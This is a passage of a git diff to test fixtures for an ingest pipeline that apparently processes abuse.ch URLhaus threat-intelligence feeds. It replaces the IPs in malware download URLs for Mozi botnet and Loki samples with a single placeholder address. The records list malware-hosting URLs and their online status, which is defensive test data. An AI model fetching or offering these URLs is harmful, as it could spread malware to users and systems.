UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://103.84.240.178:51620/Mozi.m","url_status":"offline","host":"103.84.240.178","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://115.54.239.78:42585/Mozi.a","url_status":"online","host":"115.54.239.78","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://103.46.242.87:57941/Mozi.m","url_status":"offline","host":"103.46.242.87","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://115.52.17.165:38308/i","url_status":"online","host":"115.52.17.165","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://42.227.222.174:55281/Mozi.m","url_status":"online","host":"42.227.222.174","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://42.233.232.90:57662/Mozi.a","url_status":"online","host":"42.233.232.90","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://59.97.173.255:40738/Mozi.m","url_status":"offline","host":"59.97.173.255","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://59.99.93.5:59018/Mozi.m","url_status":"offline","host":"59.99.93.5","date_added":"2021-01-14 15:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://39.66.175.56:60279/Mozi.a","url_status":"online","host":"39.66.175.56","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://27.216.188.167:52738/Mozi.m","url_status":"online","host":"27.216.188.167","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://60.212.123.142:37394/Mozi.m","url_status":"online","host":"60.212.123.142","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://58.249.22.13:56491/Mozi.m","url_status":"online","host":"58.249.22.13","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://120.193.91.214:46067/Mozi.a","url_status":"online","host":"120.193.91.214","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://89.160.20.156/js/js/lokkk.jpg","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:45:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]} +{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://89.160.20.156:33201/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://89.160.20.156:53926/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://89.160.20.156:43917/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://89.160.20.156:42053/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://89.160.20.156:57875/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://89.160.20.156:35523/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://89.160.20.156:47418/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://89.160.20.156:53007/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://89.160.20.156:38089/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://89.160.20.156:35243/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://89.160.20.156:50589/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://89.160.20.156:42479/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://89.160.20.156:43425/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://89.160.20.156:35013/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://89.160.20.156:35298/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://89.160.20.156:54174/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://89.160.20.156:42768/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://89.160.20.156:59110/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://89.160.20.156:51476/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://89.160.20.156:58839/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://89.160.20.156:50249/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://89.160.20.156:46173/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://89.160.20.156:43785/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://89.160.20.156:46924/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://89.160.20.156:59734/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://89.160.20.156:51620/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://89.160.20.156:42585/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://89.160.20.156:57941/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://89.160.20.156:38308/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://89.160.20.156:55281/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://89.160.20.156:57662/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://89.160.20.156:40738/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://89.160.20.156:59018/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://89.160.20.156:60279/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://89.160.20.156:52738/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://89.160.20.156:37394/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://89.160.20.156:56491/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://89.160.20.156:46067/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json index ce028c32b33..1afae375bb2 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json @@ -29,18 +29,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.72.223.103:34613/Mozi.m", + "original": "http://89.160.20.156:34613/Mozi.m", "scheme": "http", "port": 34613, - "domain": "103.72.223.103", - "full": "http://103.72.223.103:34613/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34613/Mozi.m" }, - "ip": "103.72.223.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692215997Z", - "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://103.72.223.103:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.72.223.103\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024388900Z", + "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://89.160.20.156:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -78,18 +78,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.30.97.184:44941/Mozi.m", + "original": "http://89.160.20.156:44941/Mozi.m", "scheme": "http", "port": 44941, - "domain": "112.30.97.184", - "full": "http://112.30.97.184:44941/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44941/Mozi.m" }, - "ip": "112.30.97.184" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692233941Z", - "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://112.30.97.184:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.97.184\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024427700Z", + "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://89.160.20.156:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -127,18 +127,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.110.198.53:37173/Mozi.m", + "original": "http://89.160.20.156:37173/Mozi.m", "scheme": "http", "port": 37173, - "domain": "113.110.198.53", - "full": "http://113.110.198.53:37173/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37173/Mozi.m" }, - "ip": "113.110.198.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692239100Z", - "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://113.110.198.53:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.110.198.53\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024435500Z", + "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://89.160.20.156:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -176,18 +176,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.20.183.170:47545/Mozi.m", + "original": "http://89.160.20.156:47545/Mozi.m", "scheme": "http", "port": 47545, - "domain": "101.20.183.170", - "full": "http://101.20.183.170:47545/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47545/Mozi.m" }, - "ip": "101.20.183.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692242827Z", - "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://101.20.183.170:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"101.20.183.170\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024442600Z", + "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://89.160.20.156:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -225,18 +225,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.8.35.22:44782/Mozi.a", + "original": "http://89.160.20.156:44782/Mozi.a", "scheme": "http", "port": 44782, - "domain": "59.8.35.22", - "full": "http://59.8.35.22:44782/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44782/Mozi.a" }, - "ip": "59.8.35.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692267133Z", - "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://59.8.35.22:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.8.35.22\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024449900Z", + "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://89.160.20.156:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -274,18 +274,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.96.37.35:44359/Mozi.a", + "original": "http://89.160.20.156:44359/Mozi.a", "scheme": "http", "port": 44359, - "domain": "59.96.37.35", - "full": "http://59.96.37.35:44359/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44359/Mozi.a" }, - "ip": "59.96.37.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692273735Z", - "original": "{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://59.96.37.35:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.96.37.35\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024457300Z", + "original": "{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://89.160.20.156:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -323,18 +323,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.239.233.17:56507/Mozi.m", + "original": "http://89.160.20.156:56507/Mozi.m", "scheme": "http", "port": 56507, - "domain": "42.239.233.17", - "full": "http://42.239.233.17:56507/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56507/Mozi.m" }, - "ip": "42.239.233.17" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692278114Z", - "original": "{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://42.239.233.17:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.239.233.17\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024464600Z", + "original": 